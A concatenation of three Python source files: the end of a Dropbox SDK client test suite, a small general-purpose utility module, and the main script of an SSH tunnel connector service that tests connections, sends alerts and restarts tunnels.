is_dir = False,
path = path,
mime_type = "text/plain"
)
def test_get_file(self):
"""Tests if storing and retrieving a file returns the same file"""
def test_get(file, path):
file_path = posixpath.join(self.test_dir, path)
self.upload_file(file, file_path)
downloaded = self.client.get_file(file_path).read()
local = open(file, "rb").read()
self.assertEqual(len(downloaded), len(local))
self.assertEqual(downloaded, local)
test_get(self.foo, "get_foo.txt")
test_get(self.frog, "get_frog.txt")
test_get(self.song, "get_song.txt")
def test_get_partial_file(self):
"""Tests if storing a file and retrieving part of it returns the correct part"""
def test_get(file, path, start_frac, download_frac):
file_path = posixpath.join(self.test_dir, path)
self.upload_file(file, file_path)
local = open(file, "rb").read()
local_len = len(local)
download_start = int(start_frac * local_len) if start_frac is not None else None
download_length = int(download_frac * local_len) if download_frac is not None else None
downloaded = self.client.get_file(file_path, start=download_start,
length=download_length).read()
local_file = open(file, "rb")
if download_start:
local_file.seek(download_start)
if download_length is None:
local_partial = local_file.read()
else:
local_partial = local_file.read(download_length)
elif download_length:
local_file.seek(-1 * download_length, 2)
local_partial = local_file.read(download_length)
self.assertEqual(len(downloaded), len(local_partial))
self.assertEqual(downloaded, local_partial)
test_get(self.foo, "get_foo.txt", 0.25, 0.5)
test_get(self.frog, "get_frog.txt", None, 0.5)
test_get(self.song, "get_song.txt", 0.25, None)
def test_metadata(self):
"""Tests if metadata returns the expected values for a files uploaded earlier"""
path = posixpath.join(self.test_dir, "foo_upload.txt")
self.upload_file(self.foo, path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path)
def test_metadata_bad(self):
"""Tests if metadata returns an error for nonexistent file"""
self.assertRaises(
ErrorResponse,
lambda: self.client.metadata(posixpath.join(self.test_dir, "foo_does_not_exist.txt"))
)
def test_create_folder(self):
"""Tests if creating a folder works"""
path = posixpath.join(self.test_dir, u"new_fold\xe9r")
metadata = self.client.file_create_folder(path)
self.dict_has(metadata,
size = "0 bytes",
bytes = 0,
is_dir = True,
path = path
)
def test_create_folder_dupe(self):
"""Tests if creating a folder fails correctly if one already exists"""
path = posixpath.join(self.test_dir, u"new_fold\xe9r_dupe")
metadata = self.client.file_create_folder(path)
self.assertRaises(
ErrorResponse,
lambda: self.client.file_create_folder(path)
)
def test_delete(self):
"""Tests if deleting a file really makes it disappear"""
path = posixpath.join(self.test_dir, u"d\xe9lfoo.txt")
self.upload_file(self.foo, path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path)
self.client.file_delete(path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo,
path = path,
bytes = 0,
size = "0 bytes",
is_deleted = True
)
def test_copy(self):
"""Tests copying a file, to ensure that two copies exist after the operation"""
path = posixpath.join(self.test_dir, "copyfoo.txt")
path2 = posixpath.join(self.test_dir, "copyfoo2.txt")
self.upload_file(self.foo, path)
self.client.file_copy(path, path2)
metadata = self.client.metadata(path)
metadata2 = self.client.metadata(path2)
self.assert_file(metadata, self.foo, path = path)
self.assert_file(metadata2, self.foo, path = path2)
def test_move(self):
"""Tests moving a file, to ensure the new copy exists and the old copy is removed"""
path = posixpath.join(self.test_dir, "movefoo.txt")
path2 = posixpath.join(self.test_dir, "movefoo2.txt")
self.upload_file(self.foo, path)
self.client.file_move(path, path2)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path, is_deleted = True, size = "0 bytes", bytes = 0)
metadata = self.client.metadata(path2)
self.assert_file(metadata, self.foo, path = path2)
def test_thumbnail(self):
path = posixpath.join(self.test_dir, "frog.jpeg")
orig_md = self.upload_file(self.frog, path)
path = orig_md['path']
modes = (
('xs', 32, 32),
('s', 64, 64),
('m', 128, 128),
('l', 640, 480),
('xl', 1024, 768),
)
for fmt in ('JPEG', 'PNG'):
prev_len = 0
for ident in ('xs', 's', 'm', 'l', 'xl'):
with self.client.thumbnail(path, ident, fmt) as r:
data1 = r.read()
r, md = self.client.thumbnail_and_metadata(path, ident, fmt)
with r:
data2 = r.read()
self.assertEquals(md, orig_md)
self.assertEquals(data1, data2)
# Make sure the amount of data returned increases as we increase the size.
self.assertTrue(len(data1) > prev_len)
prev_len = len(data1)
# Make sure the default is 'm'
with self.client.thumbnail(path, 'm') as r:
data_m = r.read()
with self.client.thumbnail(path) as r:
data1 = r.read()
r, md = self.client.thumbnail_and_metadata(path)
with r:
data2 = r.read()
self.assertEqual(data_m, data1)
self.assertEqual(data_m, data2)
def test_stream(self):
"""Tests file streaming using the /media endpoint"""
path = posixpath.join(self.test_dir, "stream_song.mp3")
self.upload_file(self.song, path)
link = self.client.media(path)
self.dict_has(link,
"url",
"expires"
)
def test_share(self):
"""Tests file streaming using the /media endpoint"""
path = posixpath.join(self.test_dir, "stream_song.mp3")
self.upload_file(self.song, path)
link = self.client.share(path)
self.dict_has(link,
"url",
"expires"
)
def test_search(self):
"""Tests searching for a file in a folder"""
path = posixpath.join(self.test_dir, "search/")
j = posixpath.join
self.upload_file(self.foo, j(path, "text.txt"))
self.upload_file(self.foo, j(path, u"t\xe9xt.txt"))
self.upload_file(self.foo, j(path, "subFolder/text.txt"))
self.upload_file(self.foo, j(path, "subFolder/cow.txt"))
self.upload_file(self.frog, j(path, "frog.jpg"))
self.upload_file(self.frog, j(path, "frog2.jpg"))
self.upload_file(self.frog, j(path, "subFolder/frog2.jpg"))
results = self.client.search(path, "sasdfasdf")
self.assertEquals(results, [])
results = self.client.search(path, "jpg")
self.assertEquals(len(results), 3)
for metadata in results:
self.assert_file(metadata, self.frog)
results = self.client.search(j(path, "subFolder"), "jpg")
self.assertEquals(len(results), 1)
self.assert_file(results[0], self.frog)
all_tex_files = {j(path, n) for n in ["text.txt", u"t\xe9xt.txt", "subFolder/text.txt"]}
results = self.client.search(path, "tex")
self.assertEquals({r["path"] for r in results}, all_tex_files)
results = self.client.search(path, u"t\xe9x")
self.assertEquals({r["path"] for r in results}, all_tex_files)
def test_revisions_restore(self):
"""Tests getting the old revisions of a file"""
path = posixpath.join(self.test_dir, "foo_revs.txt")
self.upload_file(self.foo, path)
self.upload_file(self.frog, path, overwrite = True)
self.upload_file(self.song, path, overwrite = True)
revs = self.client.revisions(path)
metadata = self.client.metadata(path)
self.assert_file(metadata, self.song, path = path, mime_type = "text/plain")
self.assertEquals(len(revs), 3)
self.assert_file(revs[0], self.song, path = path, mime_type = "text/plain")
self.assert_file(revs[1], self.frog, path = path, mime_type = "text/plain")
self.assert_file(revs[2], self.foo, path = path, mime_type = "text/plain")
metadata = self.client.restore(path, revs[2]["rev"])
self.assert_file(metadata, self.foo, path = path, mime_type = "text/plain")
metadata = self.client.metadata(path)
self.assert_file(metadata, self.foo, path = path, mime_type = "text/plain")
def test_copy_ref(self):
"""Tests using the /copy_ref endpoint to move data within a single dropbox"""
path = posixpath.join(self.test_dir, "foo_copy_ref.txt")
path2 = posixpath.join(self.test_dir, "foo_copy_ref_target.txt")
self.upload_file(self.foo, path)
copy_ref = self.client.create_copy_ref(path)
self.dict_has(copy_ref,
"expires",
"copy_ref"
)
self.client.add_copy_ref(copy_ref["copy_ref"], path2)
metadata = self.client.metadata(path2)
self.assert_file(metadata, self.foo, path = path2)
copied_foo = self.client.get_file(path2).read()
local_foo = open(self.foo, "rb").read()
self.assertEqual(len(copied_foo), len(local_foo))
self.assertEqual(copied_foo, local_foo)
def test_chunked_upload(self):
target_path = posixpath.join(self.test_dir, 'chunked_upload_file.txt')
chunk_size = 4 * 1024
random_string1, random_data1 = make_random_data(chunk_size)
random_string2, random_data2 = make_random_data(chunk_size)
new_offset, upload_id = self.client.upload_chunk(StringIO(random_string1), 0)
self.assertEquals(new_offset, chunk_size)
self.assertIsNotNone(upload_id)
new_offset, upload_id2 = self.client.upload_chunk(StringIO(random_string2), 0,
new_offset, upload_id)
self.assertEquals(new_offset, chunk_size * 2)
self.assertEquals(upload_id2, upload_id)
metadata = self.client.commit_chunked_upload('/auto' + target_path, upload_id,
overwrite=True)
self.dict_has(metadata, bytes=chunk_size * 2, path=target_path)
downloaded = self.client.get_file(target_path).read()
self.assertEquals(chunk_size * 2, len(downloaded))
self.assertEquals(random_data1, downloaded[:chunk_size])
self.assertEquals(random_data2, downloaded[chunk_size:])
def test_chunked_uploader(self):
path = posixpath.join(self.test_dir, "chunked_uploader_file.txt")
size = 10 * 1024 * 1024
chunk_size = 4 * 1024 * 1102
random_string, random_data = make_random_data(size)
uploader = self.client.get_chunked_uploader(StringIO(random_string), len(random_string))
error_count = 0
while uploader.offset < size and error_count < 5:
try:
upload = uploader.upload_chunked(chunk_size=chunk_size)
except ErrorResponse as e:
error_count += 1
uploader.finish(path)
downloaded = self.client.get_file(path).read()
self.assertEquals(size, len(downloaded))
self.assertEquals(random_data, downloaded)
def test_delta(self):
prefix = posixpath.join(self.test_dir, "delta")
a = posixpath.join(prefix, "a.txt")
self.upload_file(self.foo, a)
b = posixpath.join(prefix, "b.txt")
self.upload_file(self.foo, b)
c = posixpath.join(prefix, "c")
c_1 = posixpath.join(prefix, "c/1.txt")
self.upload_file(self.foo, c_1)
c_2 = posixpath.join(prefix, "c/2.txt")
self.upload_file(self.foo, c_2)
prefix_lc = prefix.lower()
c_lc = c.lower()
# /delta on everything
expected = { p.lower() for p in (prefix, a, b, c, c_1, c_2) }
entries = set()
cursor = None
while True:
r = self.client.delta(cursor)
if r['reset']: entries = set()
for path_lc, md in r['entries']:
if path_lc.startswith(prefix_lc+'/') or path_lc == prefix_lc:
assert md is not None, "we should never get deletes under 'prefix'"
entries.add(path_lc)
if not r['has_more']: break
cursor = r['cursor']
self.assertEqual(expected, entries)
# /delta where path_prefix=c
expected = { p.lower() for p in (c, c_1, c_2) }
entries = set()
cursor = None
while True:
r = self.client.delta(cursor, path_prefix=c)
if r['reset']: entries = set()
for path_lc, md in r['entries']:
assert path_lc.startswith(c_lc+'/') or path_lc == c_lc
assert md is not None, "we should never get deletes"
entries.add(path_lc)
if not r['has_more']: break
cursor = r['cursor']
self.assertEqual(expected, entries)
def test_longpoll_delta(self):
cursor = self.client.delta()['cursor']
def assert_longpoll():
r = self.client.longpoll_delta(cursor)
assert (r['changes'])
t = threading.Thread(target=assert_longpoll)
t.start()
self.upload_file(self.foo, posixpath.join(self.test_dir, "foo.txt"))
t.join()
def get_string_field(j, field_name):
if not j.has_key(field_name):
raise ValueError("missing field: %r" % (field_name,))
v = j[field_name]
if not isinstance(v, basestring):
raise ValueError("field %r: expecting string, but got %r" + (v,))
return v
oauth1_auth_info = None
oauth2_auth_info = None
load_oauth1_auth_info_result = None
load_oauth2_auth_info_result = None
def unittest_skip(msg):
# Fake unittest.skip() for Python 2.6.
# This only works as a class decorator.
if hasattr(unittest, 'skip'):
return unittest.skip(msg)
else:
print(msg)
return lambda cls: object
def skip_if_missing_oauth1_auth_info():
global load_oauth1_auth_info_result, oauth1_auth_info
if load_oauth1_auth_info_result is None:
fn = "tests/oauth1.auth"
try:
with open(fn, 'r') as f:
j = json.load(f)
app_key = get_string_field(j, "app_key")
app_secret = get_string_field(j, "app_secret")
access_key = get_string_field(j, "access_key")
access_secret = get_string_field(j, "access_secret")
oauth1_auth_info = app_key, app_secret, access_key, access_secret
load_oauth1_auth_info_result = (True, "")
except Exception as e:
load_oauth1_auth_info_result = (False, "error reading \"%s\": %s" % (fn, e,))
loaded, msg = load_oauth1_auth_info_result
if loaded:
return lambda f: f
else:
return unittest_skip(msg)
def skip_if_missing_oauth2_auth_info():
global load_oauth2_auth_info_result, oauth2_auth_info
if load_oauth2_auth_info_result is None:
fn = "tests/oauth2.auth"
try:
with open(fn, 'r') as f:
j = json.load(f)
access_token = get_string_field(j, "access_token")
oauth2_auth_info = access_token
load_oauth2_auth_info_result = (True, "")
except Exception as e:
load_oauth2_auth_info_result = (False, "error reading \"%s\": %s" % (fn, e,))
loaded, msg = load_oauth2_auth_info_result
if loaded:
return lambda f: f
else:
return unittest_skip(msg)
#@unittest.skipIf(*load_oauth1_auth_info())
@skip_if_missing_oauth1_auth_info()
class TestClientOAuth1(BaseClientTests, unittest.TestCase):
@classmethod
def _create_client(cls):
app_key, app_secret, access_key, access_secret = oauth1_auth_info
sess = session.DropboxSession(app_key, app_secret)
sess.set_token(access_key, access_secret)
return client.DropboxClient(sess)
#@unittest.skipIf(*load_oauth2_auth_info())
@skip_if_missing_oauth2_auth_info()
class TestClientOAuth2(BaseClientTests, unittest.TestCase):
@classmethod
def _create_client(cls):
access_token = oauth2_auth_info
return client.DropboxClient(access_token)
class TestClient(unittest.TestCase):
def test_oauth2_token_format_check(self):
bad_tokens = [
'',
'=',
'=0123',
'!AZaz09-_./~+',
'AZaz09-_./~+=.',
'abcdefg\n',
'abcdefg\t',
'abcdefg ',
'abc\ndefg',
'abc\tdefg',
'abc defg',
'\nabcdefg',
'\tabcdefg',
' abcdefg',
]
good_tokens = [
'1=',
'1',
'abcdefg',
'AZaz09-_./~+',
'AZaz09-_./~+=',
'AZaz09-_./~+==============',
'.000000000000000000000000.',
]
for t in bad_tokens:
self.assertRaises(ValueError, client.DropboxClient, t)
for t in good_tokens:
client.DropboxClient(t)
def test_chunked_uploader_bad_token(self):
c = client.DropboxClient("abcdefg")
random_string, random_data = make_random_data(10 * 1024 * 1024)
chunk_size = 4 * 1024 * 1102
uploader = c.get_chunked_uploader(StringIO(random_string), len(random_string))
try:
uploader.upload_chunked(chunk_size=chunk_size)
assert False, "expected exception for bad token"
except ErrorResponse as e:
self.assertEqual(e.status, 401)
def make_random_data(size):
random_data = os.urandom(size)
if PY3:
random_string = random_data.decode('latin1')
else:
random_string = random_data
return random_string, random_data
|
__init__.py
|
from __future__ import annotations
from dataclasses import *
from typing import *
from collections import defaultdict
from datetime import datetime
import threading
from .serializer import Serializer, serializer, from_json, to_json # type: ignore
from .nub import nub # type: ignore
from .pp import show, pr, Color # type: ignore
from .profiling import timeit, memit # type: ignore
from .args import doc_header # type: ignore
import json
from urllib.request import urlopen
A = TypeVar('A')
B = TypeVar('B')
def curl(url: str) -> Any:
ten_minutes = 60 * 10
res = json.loads(urlopen(url, timeout=ten_minutes).read())
return res
def spawn(f: Callable[[], None]) -> None:
threading.Thread(target=f, daemon=True).start()
def group_by(xs: Iterable[A], key: Callable[[A], B]) -> defaultdict[B, list[A]]:
d: dict[B, list[A]] = defaultdict(list)
for x in xs:
d[key(x)] += [x]
return d
def uniq(xs: Iterable[A]) -> Iterable[A]:
return {x: None for x in xs}.keys()
def flatten(xss: Iterable[list[A]]) -> list[A]:
return sum(xss, cast(list[A], []))
def catch(m: Callable[[], A], default: B) -> A | B:
try:
return m()
except:
return default
@dataclass(frozen=False)
class Mutable(Generic[A]):
value: A
@classmethod
def factory(cls, x: A):
return field(default_factory=lambda: cls(x))
@classmethod
def init(cls, f: Callable[[], A]):
return field(default_factory=lambda: cls(f()))
def read_commasep(s: str, p: Callable[[str], A] = lambda x: x) -> list[A]:
return [p(x.strip()) for x in s.strip().split(',') if x.strip()]
def now_str_for_filename() -> str:
return str(datetime.now()).split('.')[0].replace(' ', '_')
@dataclass(frozen=True)
class test(Generic[A]):
lhs: A
def __eq__(self, rhs: A) -> bool:
if self.lhs == rhs:
import os
if os.environ.get('verbose'):
green = Color().green
print(green('✔ '), show(self.lhs))
print(green(' =='), show(rhs))
return True
else:
red = Color().red
print(red('✗ '), show(self.lhs))
print(red(' !='), show(rhs))
raise ValueError('Equality test failed')
def iterate_with_full_context(xs: Iterable[A]) -> list[tuple[list[A], A, list[A]]]:
xs = list(xs)
return [
(xs[:i], x, xs[i+1:])
for i, x in enumerate(xs)
]
def iterate_with_context(xs: Iterable[A]) -> list[tuple[A | None, A, A | None]]:
return [
(prev[-1] if prev else None, x, next[0] if next else None)
for prev, x, next in iterate_with_full_context(xs)
]
def iterate_with_next(xs: Iterable[A]) -> list[tuple[A, A | None]]:
return [
(x, next)
for _, x, next in iterate_with_context(xs)
]
def iterate_with_prev(xs: Iterable[A]) -> list[tuple[A | None, A]]:
return [
(prev, x)
for prev, x, _ in iterate_with_context(xs)
]
test(iterate_with_full_context([1,2,3,4])) == [
([], 1, [2, 3, 4]),
([1], 2, [3, 4]),
([1, 2], 3, [4]),
([1, 2, 3], 4, []),
]
test(iterate_with_context([1,2,3,4])) == [
(None, 1, 2),
(1, 2, 3),
(2, 3, 4),
(3, 4, None)
]
def git_HEAD() -> str | None:
from subprocess import run
try:
proc = run(['git', 'rev-parse', 'HEAD'], capture_output=True)
return proc.stdout.decode().strip()[:8]
except:
return None
from datetime import timedelta
def pp_secs(seconds: int | float) -> str:
'''
Pretty-print seconds.
>>> pp_secs(0)
'0.0'
>>> pp_secs(0.1)
'0.1'
>>> pp_secs(0.09)
'0.0'
>>> pp_secs(60)
'1:00.0'
>>> pp_secs(3600)
'1:00:00.0'
>>> pp_secs(3600 + 60 * 2 + 3 + 0.4)
'1:02:03.4'
>>> pp_secs(3600 * 24 - 0.1)
'23:59:59.9'
>>> pp_secs(3600 * 24)
'1 day, 0:00:00.0'
>>> pp_secs(-0)
'0.0'
>>> pp_secs(-0.1)
'-0.1'
>>> pp_secs(-0.09)
'-0.0'
>>> pp_secs(-60)
'-1:00.0'
>>> pp_secs(-3600)
'-1:00:00.0'
>>> pp_secs(-(3600 + 60 * 2 + 3 + 0.4))
'-1:02:03.4'
>>> pp_secs(-(3600 * 24 - 0.1))
'-23:59:59.9'
>>> pp_secs(-(3600 * 24))
'-1 day, 0:00:00.0'
'''
if seconds < 0:
return '-' + pp_secs(-seconds)
s = str(timedelta(seconds=float(seconds)))
s = s.lstrip('0:')
if not s:
s = '0'
if s.startswith('.'):
s = '0' + s
if '.' in s:
pre, post = s.split('.')
return pre + '.' + post[:1]
else:
return s + '.0'
def round_nnz(x: float, ndigits: int=1) -> float:
'''
Round and normalize negative zero
'''
v = round(x, ndigits)
if v == -0.0:
return 0.0
else:
return v
def zip_with(f: Callable[[float, float], float], xs: list[float], ys: list[float], ndigits: int=1) -> list[float]:
return [round_nnz(f(a, b), ndigits=ndigits) for a, b in zip(xs, ys)]
def zip_sub(xs: list[float], ys: list[float], ndigits: int=1) -> list[float]:
return zip_with(lambda a, b: a - b, xs, ys, ndigits=ndigits)
def zip_add(xs: list[float], ys: list[float], ndigits: int=1) -> list[float]:
return zip_with(lambda a, b: a + b, xs, ys, ndigits=ndigits)
|
pytun.py
|
import argparse
import configparser
import os
import signal
import socket
import sys
import threading
import time
from concurrent.futures.thread import ThreadPoolExecutor
from multiprocessing import freeze_support
from os import listdir
from os.path import isabs, dirname, realpath
from os.path import isfile, join
import coloredlogs
from paramiko import BadHostKeyException, PasswordRequiredException, AuthenticationException, SSHException
import psutil
from alerts.email_alert import EmailAlertSender
from alerts.http_post_alert import HTTPPostAlertSender
from alerts.pooled_alerter import DifferentThreadAlert
from configure_logger import LogManager
from observation.connection_check import ConnectionCheck
from observation.http_server import inspection_http_server
from observation.status import Status
from tunnel_infra.TunnelProcess import TunnelProcess
from tunnel_infra.pathtype import PathType
from version import __version__
freeze_support()
INI_FILENAME = 'connector.ini'
def main():
parser = argparse.ArgumentParser(description='Tunnel')
parser.add_argument("--config_ini", dest="config_ini", help="Configuration file to use", default=INI_FILENAME,
type=PathType(dash_ok=False))
parser.add_argument("--test_smtp", dest="test_mail", help="Send a test email to validate the smtp config and exits",
action='store_true', default=False)
parser.add_argument("--test_http", dest="test_http", help="Send a test post to validate the http config and exits",
action='store_true', default=False)
parser.add_argument("--test_connections", dest="test_connections",
help="Test to connect to the exposed services for each connector", action='store_true',
default=False)
parser.add_argument("--test_tunnels", dest="test_connectors",
help="Test to establish each one of the connectors", action='store_true',
default=False)
parser.add_argument("--test_connectors", dest="test_connectors",
help="Test to establish each one of the connectors", action='store_true',
default=False)
parser.add_argument("--test_all", dest="test_all", help="Test connections", action="store_true", default=False)
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
args = parser.parse_args()
config = configparser.ConfigParser()
if not isabs(args.config_ini):
ini_path = join(dirname(realpath(__file__)), args.config_ini)
else:
ini_path = args.config_ini
pytun_ini_path = join(dirname(realpath(__file__)), 'pytun.ini')
if os.path.isfile(pytun_ini_path) and not os.path.isfile(join(dirname(realpath(__file__)), INI_FILENAME)):
os.rename(pytun_ini_path, join(dirname(realpath(__file__)), INI_FILENAME))
if os.path.isfile(ini_path):
config.read(ini_path)
if 'config-connector' in config:
params = config['config-connector']
else:
params = config['pytun']
else:
params = {}
test_something = args.test_mail or args.test_http or args.test_connections or args.test_connectors
tunnel_manager_id = params.get("tunnel_manager_id", '')
log_path = params.get("log_path", './logs')
if not isabs(log_path):
log_path = join(dirname(realpath(__file__)), log_path)
# Hack: sometimes when running on windows with pyinstaller and shawl a "\\?\" is added to cwd and it fails
if log_path.startswith("\\\\?\\"):
log_path = log_path.replace("\\\\?\\", "")
if not os.path.isdir(log_path):
os.mkdir(log_path)
LogManager.path = log_path
TunnelProcess.default_log_path = log_path
logger = LogManager.configure_logger('main_connector.log', params.get("log_level", "INFO"), test_something)
if tunnel_manager_id is None:
logger.error("tunnel_manager_id not set in the config file")
sys.exit(1)
smtp_sender = get_smtp_alert_sender(logger, tunnel_manager_id, params)
if args.test_mail:
test_mail_and_exit(logger, smtp_sender)
post_sender = get_post_alert_sender(logger, tunnel_manager_id, params)
if args.test_http:
test_http_and_exit(logger, post_sender)
tunnel_path = params.get("tunnel_dirs", "configs")
if not isabs(args.config_ini):
tunnel_path = join(dirname(realpath(__file__)), tunnel_path)
# Hack: sometimes when running on windows with pyinstaller and shawl a "\\?\" is added to cwd and it fails
if tunnel_path.startswith("\\\\?\\"):
tunnel_path = tunnel_path.replace("\\\\?\\", "")
files = [join(tunnel_path, f) for f in listdir(tunnel_path) if isfile(join(tunnel_path, f)) and f[-4:] == '.ini']
processes = {}
if args.test_connections:
test_connections_and_exit(files, logger, processes)
if args.test_connectors:
test_tunnels_and_exit(files, logger, processes)
if args.test_all:
coloredlogs.install(level='DEBUG', logger=logger)
http_inspection_thread = None
if params == {}:
logger.info('Failed to load the ini file.')
elif tunnel_path is None:
logger.info('Tunnel path is invalid.')
else:
try:
address = get_inspection_address(params)
http_inspection = inspection_http_server(tunnel_path, tunnel_manager_id, LogManager.path, Status(),
__version__,
address, logger)
http_inspection_thread = threading.Thread(target=lambda: http_inspection.serve_forever())
http_inspection_thread.daemon = True
except OSError as e:
logger.exception(
f"Couldn't start inspection HTTP server. Address {address[0]}:{address[1]} already in use. "
f"Exception: {e}")
test_everything(files, logger, processes, introspection_thread=http_inspection_thread)
logger.info("Press Enter to continue...")
input()
sys.exit(0)
senders = [x for x in [smtp_sender, post_sender] if x is not None]
pool = ThreadPoolExecutor(1)
main_sender = DifferentThreadAlert(alerters=senders, logger=logger, process_pool=pool)
status = Status()
start_tunnels(files, logger, processes, senders, status)
if len(processes) == 0:
logger.exception("No config files found")
sys.exit(1)
register_signal_handlers(processes, pool)
http_inspection = inspection_http_server(tunnel_path, tunnel_manager_id, LogManager.path, status, __version__,
get_inspection_address(params), logger)
http_inspection_thread = threading.Thread(target=lambda: http_inspection.serve_forever())
http_inspection_thread.daemon = True
http_inspection_thread.start()
while True:
items = list(processes.items())
to_restart = []
check_tunnels(files, items, logger, processes, to_restart, pool, main_sender)
restart_tunnels(files, logger, processes, to_restart, senders, status)
if not http_inspection_thread.is_alive():
http_inspection_thread.join()
http_inspection_thread = threading.Thread(target=lambda: http_inspection.serve_forever())
http_inspection_thread.daemon = True
http_inspection_thread.start()
time.sleep(30)
def get_inspection_address(params):
only_local = bool(params.getboolean('inspection_localhost_only', True))
return "127.0.0.1" if only_local else "0.0.0.0", params.getint('inspection_port', 9999)
def test_everything(files, logger, processes, introspection_thread=None):
logger.info("We will check your installation and configuration")
service_up = test_service_is_running(logger)
if not service_up:
service_up = test_service_is_running(logger, service_name='InvgateConnector')
if not service_up:
logger.info("The service is not running! You won't be able to access your services from the cloud")
if introspection_thread:
introspection_thread.start()
failed_connection = test_connections(files, logger, processes)
if not failed_connection:
logger.info("All the services are reachable!")
else:
logger.info("Not all the services were reachable, please check the output")
if service_up:
logger.info(
"We will partially test the tunnels because the service is up. If you need further testing, please stop the service and repeat the test")
failed_tunnels = test_tunnels(files, logger, test_reverse_forward=not service_up)
if not failed_tunnels:
logger.info("All the connectors seem to work!")
else:
logger.info("Not all the connectors are working, check the output!")
def test_service_is_running(logger, service_name='InvGateTunnel'):
logger.info("Going to check the status of the service")
if os.name == 'nt':
try:
service = psutil.win_service_get(service_name)
service = service.as_dict()
except Exception as e:
return False
logger.info("%s Service is %s", service_name, service['status'])
return service['status'] == 'running'
else:
logger.info("We are not running on windows")
return False
def test_tunnels_and_exit(files, logger, processes):
failed = test_tunnels(files, logger)
if failed:
logger.error("Some connectors failed!")
sys.exit(4)
else:
logger.info("All the connectors worked!")
sys.exit(0)
def test_tunnels(files, logger, test_reverse_forward=True):
failed = False
for each in range(len(files)):
try:
config_file = files[each]
logger.info("Going to start connector from file %s", config_file)
try:
tunnel_process = TunnelProcess.from_config_file(config_file, [])
except Exception as e:
logger.exception(
"Failed to create connector from file %s. Configuration file may be incorrect. Error detail %s",
config_file, e)
failed = True
continue
tunnel_process.logger = logger
try:
client = tunnel_process.ssh_connect(exit_on_failure=False)
transport = client.get_transport()
except socket.timeout as e:
message = """Failed to connect with %s:%s. We received a connection timeout. Please check that you have internet access, that you can access to %s using telnet. Error %r"""
logger.exception(message % (tunnel_process.server_host, tunnel_process.server_port,
(tunnel_process.server_host, tunnel_process.server_port), e))
failed = True
continue
if test_reverse_forward:
try:
transport.request_port_forward("", tunnel_process.remote_port_to_forward)
transport.close()
except SSHException as e:
message = """Failed to connect with service %s:%s. We received a Port binding rejected error. That means that we could not open our connector completely.
Please check server_host, server_port and port in your config.
Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e))
failed = True
continue
client.close()
except BadHostKeyException as e:
message = """Failed to connect with service %s:%s. The host key given by the SSH server did not match what
we were expecting.
The hostname was %s,
the expected key was %s,
the key that we got was %s
Please check server_key in your config.
Detailed Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e.hostname,
e.expected_key.get_base64(), e.key.get_base64(), e))
failed = True
except AuthenticationException as e:
message = """Failed to connect with service %s:%s. The private key file was rejected.
Please check keyfile in your config
Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e))
failed = True
except PasswordRequiredException as e:
message = """Failed to connect with service %s:%s. The private key file is encrypted.
Please check keyfile and username in your config
Error %r"""
logger.exception(message % (tunnel_process.remote_host, tunnel_process.remote_port, e))
failed = True
except Exception as e:
failed = True
logger.exception("Failed to establish connector %s with error %r" %
(tunnel_process.tunnel_name, e))
return failed
def test_internet_access(logger):
host = "8.8.8.8"
port = 53
try:
socket.setdefaulttimeout(3)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))
logger.info("It seems that we are able to access internet")
return True
except socket.error as ex:
logger.error("It seems that the server DOES NOT have internet access")
return False
def test_connections_and_exit(files, logger, processes):
failed = test_connections(files, logger, processes)
if failed:
logger.error("Some connections failed!")
sys.exit(3)
else:
logger.info("All the connections worked!")
sys.exit(0)
def test_connections(files, logger, processes):
create_tunnels_from_config([], files, logger, processes)
failed = False
test_internet_access(logger)
for key, tunnel_proc in processes.items():
with socket.socket() as sock:
try:
sock.settimeout(2)
sock.connect((tunnel_proc.remote_host, tunnel_proc.remote_port))
logger.info("Connection to %s:%s was successful", tunnel_proc.remote_host, tunnel_proc.remote_port)
except Exception as e:
logger.exception(
"Failed to connect with service %s:%s. Please check that you have internet access, that there is not a firewall blocking the connection or that remote_host and remote_port in your config are correct. Error %r" %
(tunnel_proc.remote_host, tunnel_proc.remote_port, e))
failed = True
return failed
def test_mail_and_exit(logger, smtp_sender):
if smtp_sender is None:
logger.error("No SMTP config found!")
sys.exit(2)
try:
smtp_sender.send_alert("Testing email", message="Testing email", exception_on_failure=True)
except Exception as e:
logger.exception("Failed to send email %r", e)
sys.exit(1)
logger.info("Mail test success!")
sys.exit(0)
def test_http_and_exit(logger, post_sender):
if post_sender is None:
logger.error("No http config found!")
sys.exit(2)
try:
post_sender.send_alert("Testing post", message="Testing email", exception_on_failure=True)
except Exception as e:
logger.exception("Failed to send post %r", e)
sys.exit(1)
logger.info("HTTP post test success!")
sys.exit(0)
def check_tunnels(files, items, logger, processes, to_restart, pool, pooled_sender):
for key, proc in items:
"""
pool.submit(ConnectionCheck(logger, pooled_sender).test_connection, proc.tunnel_name,
processes[key].remote_host,
processes[key].remote_port)
"""
if (not proc.is_alive()) and proc.exitcode is not None:
proc.terminate()
del processes[key]
to_restart.append(key)
logger.info("Connector %s is down", files[key])
pooled_sender.send_alert(proc.tunnel_name)
else:
logger.debug("Connector %s is up", files[key])
def restart_tunnels(files, logger, processes, to_restart, alert_senders, status):
for each in to_restart:
logger.info("Going to restart connector from file %s", files[each])
tunnel_process = TunnelProcess.from_config_file(files[each], alert_senders)
processes[each] = tunnel_process
tunnel_process.start()
status.start_tunnel(files[each])
logger.info("Connector %s has pid %s", tunnel_process.tunnel_name, tunnel_process.pid)
def register_signal_handlers(processes, pool):
def exit_gracefully(*args, **kwargs):
if pool:
pool.shutdown()
for each in processes.values():
each.terminate()
for each in processes.values():
each.join()
sys.exit(0)
signal.signal(signal.SIGINT, exit_gracefully)
signal.signal(signal.SIGTERM, exit_gracefully)
def start_tunnels(files, logger, processes, alert_senders, status):
create_tunnels_from_config(alert_senders, files, logger, processes)
for key, tunnel_process in processes.items():
tunnel_process.start()
status.start_tunnel(files[key])
logger.info("Connector %s has pid %s", tunnel_process.tunnel_name, tunnel_process.pid)
def create_tunnels_from_config(alert_senders, files, logger, processes):
for each in range(len(files)):
config_file = files[each]
logger.info("Going to start connector from file %s", config_file)
try:
